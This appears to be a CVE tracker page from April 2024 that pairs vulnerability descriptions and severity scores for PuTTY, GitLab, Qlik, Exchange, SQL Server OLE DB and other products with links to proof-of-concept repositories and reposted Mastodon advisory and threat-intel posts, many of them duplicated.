SolarWinds Serv-U was found to be susceptible to a Directory Traversal Remote Code Vulnerability. This vulnerability requires a highly privileged account to be exploited.

screaminggoat at 2024-04-23T11:30:23.931Z ##

Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:

  • CVE-2024-28073 (8.4 high) SolarWinds Serv-U Directory Traversal Remote Code Execution Vulnerability
  • CVE-2024-29001 (7.5 high) SolarWinds Platform SWQL Injection Vulnerability
  • CVE-2024-29003 (7.5 high) SolarWinds Platform Cross Site Scripting Vulnerability

##

CVE-2024-22354
(7.0 HIGH)

EPSS: 0.04%

updated 2024-04-17T12:48:07.510000

2 posts

IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.3 are vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information, consume memory resources, or to conduct a server-side request forgery attack. IBM X-Force ID: 280401.

CVE-2024-21111
(7.8 HIGH)

EPSS: 0.04%

updated 2024-04-17T12:48:07.510000

4 posts

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM

1 repos

https://github.com/mansk1es/CVE-2024-21111

CVE-2024-31497(CVSS UNKNOWN)

EPSS: 0.05%

updated 2024-04-17T00:31:29

11 posts

In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. One scenario is that the adversary is an operator of an SSH server to which the victim authenticates (f

2 repos

https://github.com/sh1k4ku/CVE-2024-31497

https://github.com/edutko/cve-2024-31497

kaito834 at 2024-04-25T22:58:43.689Z ##

JVNVU#91264077: PuTTY SSHクライアントのECDSA署名処理に脆弱性 jvn.jp/vu/JVNVU91264077/ 2024/04/18公開

「NIST P521楕円曲線によるECDSA秘密鍵を使っている場合、署名を行う際に生成するnonceに偏り...(CVE-2024-31497...)...60個程度の署名データから、使用している秘密鍵を特定される可能性」

##

ajn142 at 2024-04-22T20:50:49.147Z ##

Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.

chaos.social/@gsuberland/11227

##

ajn142 at 2024-04-22T01:22:11.217Z ##

My thoughts on this are being driven by recent experiences RE CVE-2024-31497 on workstations and servers, but I want to listen to the folks who do this for a living before I start talking too much.

##

team@manitu.social at 2024-04-19T08:21:48.000Z ##

Wer es noch nicht gesehen hat:

cve.mitre.org/cgi-bin/cvename.

Wer #Putty < 0.81 nutzt, sollte updaten (auch wenn es "nur" einen Algo betrifft):

chiark.greenend.org.uk/~sgtath

##

ajn142@infosec.exchange at 2024-04-22T20:50:49.000Z ##

Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.

chaos.social/@gsuberland/11227

##

ajn142@infosec.exchange at 2024-04-22T01:22:11.000Z ##

My thoughts on this are being driven by recent experiences RE CVE-2024-31497 on workstations and servers, but I want to listen to the folks who do this for a living before I start talking too much.

##

team@manitu.social at 2024-04-19T08:21:48.000Z ##

Wer es noch nicht gesehen hat:

cve.mitre.org/cgi-bin/cvename.

Wer #Putty < 0.81 nutzt, sollte updaten (auch wenn es "nur" einen Algo betrifft):

chiark.greenend.org.uk/~sgtath

##

paoloredaelli@mastodon.uno at 2024-04-18T05:06:50.000Z ##

#PuTTY #SSH client flaw allows recovery of #cryptographic #private keys

bleepingcomputer.com/news/secu

> A vulnerability tracked as CVE-2024-31497 in PuTTY 0.68 through 0.80 could potentially allow attackers with access to 60 cryptographic signatures to recover the private key used for their generation.

##

paul@oldfriends.live at 2024-04-18T04:59:25.000Z ##

Urgent: PuTTY 0.81, released on 4/15/2024, fixes a critical vulnerability CVE-2024-31497 in the use of 521-bit ECDSA keys (ecdsa-sha2-nistp521). If you have used a 521-bit ECDSA private key with any previous version of PuTTY, consider the private key compromised: remove the public key from authorized_keys files, and generate a new key pair.

Should update FileZilla and other software, too, for same reason. #MastoAdmin

chiark.greenend.org.uk/~sgtath

CVE: cve.mitre.org/cgi-bin/cvename.

##

BenjaminHCCarr@hachyderm.io at 2024-04-17T10:34:04.000Z ##

#PuTTY #SSH client flaw allows recovery of #cryptographic #privatekeys
The vulnerability (CVE-2024-31497) was discovered by Fabian Bäumer and Marcus Brinkmann of the Ruhr University Bochum and is caused by how PuTTY generates #ECDSA nonces (temporary unique cryptographic numbers) for the NIST P-521 curve used for SSH authentication. The main repercussion of recovering the private key is that it allows unauthorized access to SSH servers or sign commits as the developer.
bleepingcomputer.com/news/secu

##

ericfreyss@mastodon.social at 2024-04-17T06:20:22.000Z ##

Cette faille dans #PuTTY permet de récupérer les clés privées it-connect.fr/faille-de-securi

##

CVE-2024-2279
(8.7 HIGH)

EPSS: 0.04%

updated 2024-04-12T03:30:44

2 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.7 to 16.8.6 all versions starting from 16.9 before 16.9.4, all versions starting from 16.10 before 16.10.2. Using the autocomplete for issues references feature a crafted payload may lead to a stored XSS, allowing attackers to perform arbitrary actions on behalf of victims.

screaminggoat at 2024-04-26T11:57:27.519Z ##

SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."

##

screaminggoat@infosec.exchange at 2024-04-26T11:57:27.000Z ##

SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."

#GitLab #CVE_2024_2279 #XSS

##

CVE-2024-21338
(7.8 HIGH)

EPSS: 0.11%

updated 2024-04-11T21:30:45

2 posts

Windows Kernel Elevation of Privilege Vulnerability

3 repos

https://github.com/UMU618/CVE-2024-21338

https://github.com/hakaioffsec/CVE-2024-21338

https://github.com/varwara/CVE-2024-21338

screaminggoat at 2024-04-18T14:37:07.049Z ##

Avast previously reported that North Korean APT Lazarus Group exploited the Windows kernel driver vulnerability CVE-2024-21338 as a zero-day. This blog post expands on that reporting, revealing that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Avast was able to uncover almost the entire attack chain. They also found a previously undocumented Kaolin RAT, where it could aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from the C2 server. IOC provided.🔗 decoded.avast.io/luiginocamast

##

simontsui@infosec.exchange at 2024-04-18T14:37:07.000Z ##

Avast previously reported that North Korean APT Lazarus Group exploited the Windows kernel driver vulnerability CVE-2024-21338 as a zero-day. This blog post expands on that reporting, revealing that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Avast was able to uncover almost the entire attack chain. They also found a previously undocumented Kaolin RAT, where it could aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from the C2 server. IOC provided.🔗 decoded.avast.io/luiginocamast

#threatintel #DFIR #IOC #NorthKorea #cyberespionage #Lazarus #APT #CVE_2024_21338 #KaolinRAT

##

CVE-2024-20697
(7.3 HIGH)

EPSS: 0.06%

updated 2024-04-11T21:30:44

3 posts

Windows Libarchive Remote Code Execution Vulnerability

simontsui@infosec.exchange at 2024-04-17T17:20:50.000Z ##

Trend Micro researchers provide a vulnerability analysis on CVE-2024-20697 (7.3 high, disclosed 09 January 2024 by Microsoft) Windows Libarchive Remote Code Execution Vulnerability. 🔗 zerodayinitiative.com/blog/202

An integer overflow vulnerability exists in the Libarchive library included in Microsoft Windows. The vulnerability is due to insufficient bounds checks on the block length of a RARVM filter used for Intel E8 preprocessing, included in the compressed data of a RAR archive.
A remote attacker could exploit this vulnerability by enticing a target user into extracting a crafted RAR archive. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library.

#CVE_2024_20697 #RCE #vulnerability

##

xnyhps@infosec.exchange at 2024-04-17T14:54:00.000Z ##

You need to run a VM. To unpack RAR files. What the hell. 😂

zerodayinitiative.com/blog/202

##

thezdi@infosec.exchange at 2024-04-17T13:05:01.000Z ##

CVE-2024-20697: Windows Libarchive Remote Code Execution Vulnerability -- The Trend Micro Research Team takes a deep dive into this recently patch bug. An attacker could exploit this bug by enticing a user into extracting a crafted RAR archive. Read all the details at zerodayinitiative.com/blog/202

##

CVE-2023-41266
(8.2 HIGH)

EPSS: 85.11%

updated 2024-04-11T21:06:16

2 posts

A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023

Nuclei template

1 repos

https://github.com/praetorian-inc/zeroqlik-detect

screaminggoat at 2024-04-26T14:59:18.789Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

##

screaminggoat@infosec.exchange at 2024-04-26T14:59:18.000Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel

##

CVE-2024-26198
(8.8 HIGH)

EPSS: 0.53%

updated 2024-04-11T20:15:35.127000

2 posts

Microsoft Exchange Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-23T18:07:50.495Z ##

Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 msrc.microsoft.com/update-guid

Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.

I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.

##

screaminggoat@infosec.exchange at 2024-04-23T18:07:50.000Z ##

Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 msrc.microsoft.com/update-guid

Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.

I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.

#CVE_2024_26198 #Microsoft #MSRC #vulnerability #PatchTuesday

##

CVE-2024-28913
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-10T13:24:00.070000

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28908
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-10T13:24:00.070000

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
